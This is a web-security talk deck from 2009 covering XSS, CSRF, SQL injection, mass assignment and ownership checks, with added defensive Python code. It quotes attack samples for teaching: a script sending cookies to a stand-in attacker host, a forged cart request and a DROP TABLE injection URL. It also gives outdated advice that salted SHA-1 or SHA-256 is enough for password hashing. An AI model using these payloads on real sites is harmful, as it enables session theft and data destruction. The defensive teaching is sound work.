Web Security 101 (2009 Barcamp Nashville)
Who is this guy? Brian Dailey, realm3 web applications
Security is serious.
Even when you might think it's not.
TRUST ME Security is all about trust.
Physical / Network / Server / Application
XSS: The user believes you are this guy: But this guy is really watching:
XSS: Methods
  Non-persistent: entice the user to load a page (by clicking a link or through a hidden frame) that injects client-side script.
  Persistent: save the script to the database and get users to load the page that renders it.
XSS: Give me back my session!
  <script>
  document.write('<img src="http://my.hacker.com/me.php?cookie=' + document.cookie + '" width="1" height="1" />');
  </script>
XSS: Another example: embed a form that captures a saved password, then collect it. If you can inject JavaScript or HTML, you can do all sorts of nefarious things.
XSS Prevention: Always escape output. How you escape depends upon context.
  - HTML entities
  - Whitelisting HTML tags (blacklisting is tricky!)
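Context-aware escaping and tag whitelisting in Python, as an added example that is not from the slides: the same untrusted value (the cookie-stealing payload above, embedded here as a constructed sample) is rendered into HTML body, attribute, inline-script and URL contexts with the escaping each one needs, and a whitelist filter is shown for rich text.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed sample: the cookie-stealing payload from the XSS slide, as a
# value an attacker might submit in a "display name" field.
PAYLOAD = ("<script>document.write('<img src=\"http://my.hacker.com/me.php?cookie=' "
           "+ document.cookie + '\" width=\"1\" height=\"1\" />');</script>")


def escape_html_body(value: str) -> str:
    """Text node in the HTML body: & < > " ' become entities."""
    return html.escape(value, quote=True)


def escape_html_attr(value: str) -> str:
    """Value inside a double-quoted attribute: same entities, and the
    caller must actually put quotes around the attribute."""
    return html.escape(value, quote=True)


def escape_js_string(value: str) -> str:
    """Value embedded in an inline <script> string literal. Entities are
    not decoded inside <script>, so entity-escaping is useless here:
    JSON-encode instead, and escape < > so '</script>' cannot end the block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def escape_url_param(value: str) -> str:
    """Value used as a query-string parameter."""
    return quote(value, safe="")


def render_profile(display_name: str) -> str:
    """One untrusted value rendered into four contexts, each escaped for
    that context."""
    return (
        f"<p>Hello, {escape_html_body(display_name)}</p>\n"
        f'<input type="text" value="{escape_html_attr(display_name)}">\n'
        f"<script>var name = {escape_js_string(display_name)};</script>\n"
        f'<a href="/search?q={escape_url_param(display_name)}">search</a>'
    )


def contains_live_payload(page: str) -> bool:
    """Did the raw script tag or an attribute-closing sequence survive?"""
    return "<script>document.write" in page or '"><' in page


class TagWhitelister(HTMLParser):
    """Whitelisting for rich text: keep a fixed set of harmless tags with
    their attributes dropped; escape every other tag and all text.
    Blacklisting known-bad tags is what the slide warns against."""
    ALLOWED = {"b", "i", "em", "strong", "p"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ALLOWED:
            self.out.append(f"<{tag}>")            # attributes deliberately dropped
        else:
            self.out.append(html.escape(self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):      # e.g. <img ... />
        self.out.append(html.escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        close = f"</{tag}>"
        self.out.append(close if tag in self.ALLOWED else html.escape(close))

    def handle_data(self, data):
        self.out.append(html.escape(data))         # <script> bodies arrive here too


def whitelist_tags(value: str) -> str:
    parser = TagWhitelister()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)
```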
CSRF (Cross-site Request Forgery) Exploit server's trust of user.
CSRF You think this is your user: But really it is:
CSRF Example:
  <img src="http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor" height="1" width="1" />
Works especially well with GET requests, but using POST is not a surefire way to prevent this.
CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
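One way to "authorize each user action", added here and not part of the slides: a per-session random token that only your own pages can embed, required on every state-changing POST; the session store, handler and function names are constructed for the example.

```python
import hmac
import secrets

# Constructed stand-in for the server-side session store: session id -> data.
# The session id rides in the cookie the browser attaches automatically,
# which is exactly the trust a forged <img> request abuses.
SESSIONS = {"sess-alice": {"user": "alice", "cart": []}}


def issue_csrf_token(session_id: str) -> str:
    """Create, once per session, the random token that only pages served
    by your own site can embed."""
    session = SESSIONS[session_id]
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def render_add_to_cart_form(session_id: str, item_id: int) -> str:
    """The legitimate form carries the token as a hidden field."""
    token = issue_csrf_token(session_id)
    return (
        '<form method="POST" action="/addtocart.php">'
        f'<input type="hidden" name="item_id" value="{item_id}">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        "<button>Add to cart</button></form>"
    )


def add_to_cart(method: str, session_id: str, params: dict) -> tuple:
    """Handler for the state-changing action. Returns (status, message)."""
    # 1. Never modify data on GET: an <img src=...> can only ever send GET.
    if method != "POST":
        return 405, "state-changing requests must use POST"
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "not logged in"
    # 2. POST alone is not enough (cross-site POSTs are easy to trigger too):
    #    require the per-session token and compare it in constant time.
    expected = session.get("csrf")
    supplied = str(params.get("csrf_token", ""))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    # 3. Take the shipping identity from the session, never from the request.
    session["cart"].append({"item_id": int(params["item_id"]),
                            "ship_to": session["user"]})
    return 200, "added"


def forged_get_outcome() -> int:
    """What the <img> tag on the CSRF slide achieves: the victim's cookie is
    sent, but the request is a GET and carries no token."""
    status, _ = add_to_cart("GET", "sess-alice",
                            {"item-id": "12", "ship_to": "l33t_haxor"})
    return status


def forged_post_outcome() -> int:
    """The same forgery as a POST: still no token, still refused."""
    status, _ = add_to_cart("POST", "sess-alice",
                            {"item_id": "12", "ship_to": "l33t_haxor"})
    return status


def legitimate_outcome() -> int:
    """The real round-trip: token issued with the page, echoed on submit."""
    render_add_to_cart_form("sess-alice", 12)
    token = SESSIONS["sess-alice"]["csrf"]
    status, _ = add_to_cart("POST", "sess-alice",
                            {"item_id": "12", "csrf_token": token})
    return status
```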
SQL Injection
SQL Injection
  String sql = "SELECT * FROM users WHERE name LIKE '%" + name + "'";
  http://www.subgenius.com/person.jsp?name=foobar';+DROP+TABLE+USERS--
SQL Injection Prevention: This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.)
  String sql = "SELECT * FROM users WHERE name LIKE ?";
  java.sql.PreparedStatement stmt = conn.prepareStatement(sql);
  stmt.setString(1, request.getParameter("name"));
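The slide's lookup reproduced in Python against an in-memory SQLite table, as an added example that is not from the slides, so the concatenated and the parameterized form can be compared on the same input; it also covers the LIKE-wildcard caveat that parameters alone do not handle (table contents are constructed).

```python
import sqlite3

# The attacker-controlled 'name' parameter from the slide's URL, URL-decoded.
PAYLOAD = "foobar'; DROP TABLE USERS--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a users table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("alice",), ("bob",), ("foobar",)])
    return conn


def build_unsafe_sql(name: str) -> str:
    """The slide's vulnerable pattern: input glued into the SQL text, so a
    quote in the input ends the literal and the rest is parsed as SQL."""
    return "SELECT * FROM users WHERE name LIKE '%" + name + "'"


def search_unsafe(conn, name):
    """Run the concatenated SQL. Python's sqlite3 refuses to execute more
    than one statement per call, so here the injected DROP surfaces as an
    error instead of running; a driver that batches statements would run
    it. Either way the input has become code."""
    try:
        return [row[1] for row in conn.execute(build_unsafe_sql(name))]
    except (sqlite3.Warning, sqlite3.Error) as exc:
        return f"error: {exc}"


def escape_like(value: str) -> str:
    """Caveat: parameters stop injection, but % and _ in the value are still
    LIKE wildcards. Escape them when the user is meant to match literally."""
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))


def search_safe(conn, name):
    """Parameterized version of the slide's PreparedStatement: the value is
    bound separately from the SQL text, so quotes and semicolons are data.
    The leading % from the original query is added in code, not by the user."""
    pattern = "%" + escape_like(name)
    rows = conn.execute("SELECT * FROM users WHERE name LIKE ? ESCAPE '\\'",
                        (pattern,))
    return [row[1] for row in rows]


def table_exists(conn, table: str) -> bool:
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (table,)).fetchone()
    return row[0] == 1


def table_survives_unsafe_search(name: str) -> bool:
    """Run the unsafe search on a fresh database, then report whether the
    users table still exists."""
    conn = make_db()
    search_unsafe(conn, name)
    return table_exists(conn, "users")
```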
Frameworks are helpful.
They can come with their own set of issues.
Mass Assignment
Mass Assignment: Rails example:
  @user = User.find(current_user.id)
  @user.update_attributes(params[:user])
If I POST user[is_admin]=1 ... W00t! I pwned u! Fix by using attr_accessible (in the model) or by whitelisting. http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
Mass Assignment: Symfony: if you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP:
  # Anything about $this->data could be changed!
  # This makes me sad.
  $this->Post->save($this->data);
Ownership
Ownership Authorization, Rails:
  # bad
  @post = Post.find(params[:id])
  # good
  @post = current_user.posts.find(params[:id])
Ownership Authorization, CakePHP:
  // bad
  $post = $this->Post->findById($id);
  // good
  $post = $this->Post->find('first', array(
      'conditions' => array(
          'id' => $id,
          'user_id' => $this->Auth->user('id'),
      ),
  ));
Ownership Authorization, Symfony:
  // bad
  $post = Doctrine::getTable('Post')->find($id);
  // good
  $post = Doctrine_Query::create()
      ->select('*')
      ->from('Post p')
      ->where('p.id = ?', $id)
      ->andWhere('p.user_id = ?', $user_id)   // a second where() would replace the first condition
      ->fetchOne();
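An added Python example, not from the slides, serving both the Mass Assignment and the Ownership slides: an update handler that scopes the lookup to the current user first and then applies only whitelisted attributes; the schema, table names and sample rows are constructed.

```python
import sqlite3

# The attr_accessible equivalents: the only columns a request may set.
PERMITTED_USER_ATTRS = ("name",)
PERMITTED_POST_ATTRS = ("title", "body")


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one post each."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
                 "is_admin INTEGER NOT NULL DEFAULT 0)")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, user_id INTEGER, "
                 "title TEXT, body TEXT)")
    conn.executemany("INSERT INTO users (id, name) VALUES (?, ?)",
                     [(1, "alice"), (2, "mallory")])
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?, ?)",
                     [(10, 1, "alice's post", "hello"), (20, 2, "mallory's post", "hi")])
    return conn


def whitelist(params: dict, permitted: tuple) -> dict:
    """Keep only permitted keys; is_admin, user_id and anything else the
    client invents are silently dropped."""
    return {key: value for key, value in params.items() if key in permitted}


def _apply_update(conn, table, attrs, where_sql, where_params):
    """SET clause built from whitelisted column names only; the values and
    the WHERE arguments are bound as parameters."""
    if not attrs:
        return
    assignments = ", ".join(f"{column} = ?" for column in attrs)
    conn.execute(f"UPDATE {table} SET {assignments} WHERE {where_sql}",
                 (*attrs.values(), *where_params))


def update_user(conn, current_user_id: int, params: dict) -> None:
    """The slide's @user.update_attributes(params[:user]), filtered first,
    so a posted user[is_admin]=1 never reaches the database."""
    _apply_update(conn, "users", whitelist(params, PERMITTED_USER_ATTRS),
                  "id = ?", (current_user_id,))


def user_row(conn, user_id: int) -> tuple:
    return conn.execute("SELECT name, is_admin FROM users WHERE id = ?",
                        (user_id,)).fetchone()


def find_post_unscoped(conn, post_id: int):
    """The 'bad' lookup: Post.find(params[:id]) finds anyone's post."""
    return conn.execute("SELECT id, user_id, title, body FROM posts WHERE id = ?",
                        (post_id,)).fetchone()


def find_post_for_user(conn, post_id: int, user_id: int):
    """The 'good' lookup: current_user.posts.find(params[:id]); the owner is
    part of the query, so other users' posts do not exist from here."""
    return conn.execute(
        "SELECT id, user_id, title, body FROM posts WHERE id = ? AND user_id = ?",
        (post_id, user_id)).fetchone()


def update_post(conn, current_user_id: int, post_id: int, params: dict) -> bool:
    """Ownership check first, whitelist second. Returns False when the post
    is not the current user's (answer 404 rather than 403, so the response
    does not confirm that the id exists)."""
    if find_post_for_user(conn, post_id, current_user_id) is None:
        return False
    _apply_update(conn, "posts", whitelist(params, PERMITTED_POST_ATTRS),
                  "id = ? AND user_id = ?", (post_id, current_user_id))
    return True


def scenario() -> dict:
    """Walk both slides' attempts against a fresh database."""
    conn = make_db()
    update_user(conn, 1, {"name": "Alice", "is_admin": "1"})   # mass assignment
    return {
        "alice": user_row(conn, 1),
        "unscoped_finds_it": find_post_unscoped(conn, 10) is not None,
        "scoped_for_mallory": find_post_for_user(conn, 10, 2),
        "mallory_edit": update_post(conn, 2, 10, {"title": "defaced"}),
        "alice_edit": update_post(conn, 1, 10, {"title": "edited", "user_id": 2}),
        "post": find_post_unscoped(conn, 10),
    }
```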
Other Considerations
  - Rate limit user login attempts to prevent brute-force attacks.
    + Use caching (memcache) to track attempts.
  - Always hash user passwords.
    + MD5 is no good; use SHA-1, SHA-256 & salt.
Useful Resources
  Potential Attacks Overview (OWASP has a ton of info!): http://www.owasp.org/index.php/Category:Attack
  Google Code University on Web Security: http://code.google.com/edu/security/index.html
  Rails Security Guide: http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
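Added example (not from the slides) for both points above: a per-account attempt counter with an expiry window standing in for the memcache counter, plus salted password hashing. Where the slide says salted SHA-1/SHA-256, this uses PBKDF2-HMAC-SHA256, which is salted SHA-256 iterated many times so each guess costs more; the user store, key format and hash format are constructed for the example.

```python
import hashlib
import hmac
import os
import time

MAX_ATTEMPTS = 5          # failures allowed per (account, client) in the window
WINDOW_SECONDS = 300
ITERATIONS = 100_000      # PBKDF2 rounds; raise as hardware allows

# Constructed stand-in for the memcache counter: key -> (count, expires_at).
# With real memcache you would incr() a key created with this TTL.
_ATTEMPTS = {}


def _key(username: str, ip: str) -> str:
    return f"login:{username}:{ip}"


def record_failure(username: str, ip: str, now: float) -> int:
    count, expires_at = _ATTEMPTS.get(_key(username, ip), (0, 0.0))
    if now >= expires_at:                      # window elapsed: start a new one
        count, expires_at = 0, now + WINDOW_SECONDS
    _ATTEMPTS[_key(username, ip)] = (count + 1, expires_at)
    return count + 1


def is_locked(username: str, ip: str, now: float) -> bool:
    count, expires_at = _ATTEMPTS.get(_key(username, ip), (0, 0.0))
    return now < expires_at and count >= MAX_ATTEMPTS


def clear_failures(username: str, ip: str) -> None:
    _ATTEMPTS.pop(_key(username, ip), None)


def hash_password(password: str, salt=None) -> str:
    """Salted, iterated SHA-256. A fresh random salt per user means two
    users with the same password get different hashes and precomputed
    tables are useless."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


# Constructed user store: username -> stored hash. DUMMY is verified against
# for unknown usernames so response time does not reveal which names exist.
USERS = {"alice": hash_password("correct horse battery staple")}
DUMMY = hash_password("placeholder")


def login(username: str, password: str, ip: str, now=None) -> str:
    """Returns 'locked', 'ok' or 'bad'. The lock check runs before any
    hashing, so a locked account costs the server nothing per guess."""
    now = time.time() if now is None else now
    if is_locked(username, ip, now):
        return "locked"
    stored = USERS.get(username)
    matched = verify_password(password, stored or DUMMY) and stored is not None
    if matched:
        clear_failures(username, ip)
        return "ok"
    record_failure(username, ip, now)
    return "bad"
```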

Wrapping Things Up
  DO: Assume that users can be malicious. Assume that your data is important (it should be!)
  DON'T: Assume your framework handles all security concerns. Assume your application is "unbreakable."
Thanks! Any questions? Brian Dailey, realm3 web applications. Web: http://realm3.com/ Twitter: @brian_dailey Email: brian@realm3.com Phone: 917-512-3594 slide-bg: http://bit.ly/xc0m1 Kudos to: http://asi9.net/